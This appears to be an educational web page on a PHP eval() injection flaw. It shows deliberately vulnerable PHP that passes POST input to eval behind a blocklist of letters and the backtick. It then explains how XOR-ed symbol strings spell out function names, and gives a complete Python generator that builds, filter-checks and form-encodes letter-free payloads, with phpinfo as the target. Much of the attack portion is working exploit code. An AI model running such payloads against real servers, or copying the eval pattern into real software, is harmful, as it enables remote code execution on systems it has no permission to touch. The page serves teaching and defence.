How it works

This page explains a common vulnerability pattern (user input passed to eval) and the specific technique used to bypass a naive input filter that rejects alphabetic characters and the backtick but lets every other printable character, digits included, through.

Vulnerable code (example)

<?php
if (isset($_POST['input'])) {
    // Blocklist: reject any letter or backtick. Digits and every other
    // printable symbol (including ^ . ( ) ' _ $) pass through untouched.
    if (!preg_match('/[a-zA-Z`]/', $_POST['input'])) {
        print '<fieldset><legend>Result</legend>';
        // The raw input becomes part of the PHP source that is executed.
        eval('print ' . $_POST['input'] . ";");
        print '</fieldset>';
    } else {
        echo "<p>Dangerous code detected</p>";
    }
}
?>

Why this is a problem

  • The code uses eval, which compiles and executes PHP source assembled from user input; the filter is the only thing standing between the request and arbitrary code.
  • The filter is a blocklist that rejects only alphabetic characters and the backtick (`). Every other printable character (symbols and digits) is allowed, including the operators and quotes needed to write PHP expressions.
  • An attacker can therefore build letters, and from them complete function names, using PHP's string operators on characters the filter allows. The bitwise XOR operator ^ applied to two one-character strings XORs their bytes: '#'^'@' is chr(0x23 ^ 0x40) = chr(0x63) = 'c', even though neither operand is a letter.
  • Result: arbitrary PHP runs in the web server's context. Whether that means command execution on the host, reading files, or disclosing configuration depends on what the PHP process is allowed to do.

How the bypass works (high level)

  1. Pick pairs of printable characters the filter allows (symbols and digits) whose bytes XOR to the letter you need, for example "#" and "@": "#"^"@" evaluates to "c" at runtime. Both operands must be non-numeric strings, because PHP XORs two numeric strings as integers rather than byte by byte.
  2. Spell longer strings either by concatenating single-character XOR expressions with PHP's . operator, or by XORing two equal-length strings in one expression ('....'^'....'), which yields the whole function name at once without a single literal letter in the POST input.
  3. Invoke the result: a string holding a function name is callable, so on PHP 7 and later ('...'^'...')() calls the function directly, and on any version $_=('...'^'...'); $_(); does the same ($_ contains no letters).
  4. The server-side regex sees only symbols, digits and quotes, so the input passes the check and eval executes the constructed code. When the payload is sent as form data it must be URL-encoded, since a raw + decodes to a space and a raw & ends the field.
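
Putting the steps above together as an added example (not code from the original page): a small Python generator that, for a chosen function name, finds filter-safe XOR pairs, emits the PHP expression, runs the page's own regex over it, and models PHP's string XOR locally to confirm what the server would decode. It assumes PHP behaviour the page does not spell out: ^ on two non-numeric strings is a byte-wise XOR over the shorter operand's length, and on PHP 7 and later a parenthesised string expression can be invoked directly as a callable. The target function phpinfo, the helper names and the filter-safe character set are this example's own choices.

```python
"""Generate a letter-free PHP payload for the eval() filter bypass described above.

Added example, not code from the original page. Assumed PHP semantics:
^ on two non-numeric strings XORs them byte by byte (result length is the
shorter operand), and ('...'^'...')() invokes the function the XOR spells out.
"""
import re
from urllib.parse import urlencode

# The check the vulnerable page runs over $_POST['input']: letters and backtick.
FILTER = re.compile(r"[a-zA-Z`]")

# Printable ASCII the filter lets through (symbols and digits), minus the two
# characters that would need escaping inside a single-quoted PHP string.
ALLOWED = [c for c in map(chr, range(0x21, 0x7F))
           if not FILTER.search(c) and c not in "'\\"]

# Crude approximation of PHP's numeric-string rule. If BOTH operands of ^ are
# numeric strings PHP XORs them as integers instead of byte by byte, so such
# operand pairs must be rejected rather than emitted.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$")


def xor_pair(target_char: str) -> tuple[str, str]:
    """Two filter-safe characters whose byte-wise XOR is target_char."""
    want = ord(target_char)
    for a in ALLOWED:
        b = chr(want ^ ord(a))
        if b in ALLOWED:
            return a, b
    raise ValueError(f"no filter-safe pair produces {target_char!r}")


def xor_parts(target: str) -> tuple[str, str]:
    """Two equal-length filter-safe strings whose XOR spells target."""
    pairs = [xor_pair(ch) for ch in target]
    left = "".join(a for a, _ in pairs)
    right = "".join(b for _, b in pairs)
    if PHP_NUMERIC.match(left) and PHP_NUMERIC.match(right):
        raise ValueError("both operands numeric: PHP would XOR them as integers")
    return left, right


def xor_literal(target: str) -> str:
    """PHP expression ('....'^'....') that evaluates to target at runtime."""
    left, right = xor_parts(target)
    return f"('{left}'^'{right}')"


def php_xor(left: str, right: str) -> str:
    """Local model of PHP's string ^ string, used to check what we emit."""
    return "".join(chr(ord(a) ^ ord(b)) for a, b in zip(left, right))


def call_payload(func: str, *args: str) -> str:
    """Expression calling func(*args) with every name spelled via XOR."""
    callee = xor_literal(func)
    arglist = ",".join(xor_literal(a) for a in args)
    return f"{callee}({arglist})"


def passes_filter(payload: str) -> bool:
    """True when the server's preg_match would NOT flag this input."""
    return FILTER.search(payload) is None


def evaluated_statement(payload: str) -> str:
    """The exact string the vulnerable page hands to eval()."""
    return f"print {payload};"


def post_body(payload: str) -> str:
    """Form-encode for the POST so '+' and '&' do not reach the server raw."""
    return urlencode({"input": payload})


if __name__ == "__main__":
    payload = call_payload("phpinfo")          # ('...'^'...')()
    print("payload  :", payload)
    print("filter   :", "passes" if passes_filter(payload) else "BLOCKED")
    print("eval sees:", evaluated_statement(payload))
    print("decodes  :", php_xor(*xor_parts("phpinfo")))
    print("POST body:", post_body(payload))
```

Run it to see the payload the filter accepts and the statement eval would compile; php_xor is only a local check that the two operand strings really spell the intended name. The numeric-string guard never fires for letters (a digit XORed with a digit is below 0x10, never a letter) but matters if the same generator is reused for other targets.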

This page is educational. Do not use these techniques against systems without explicit permission.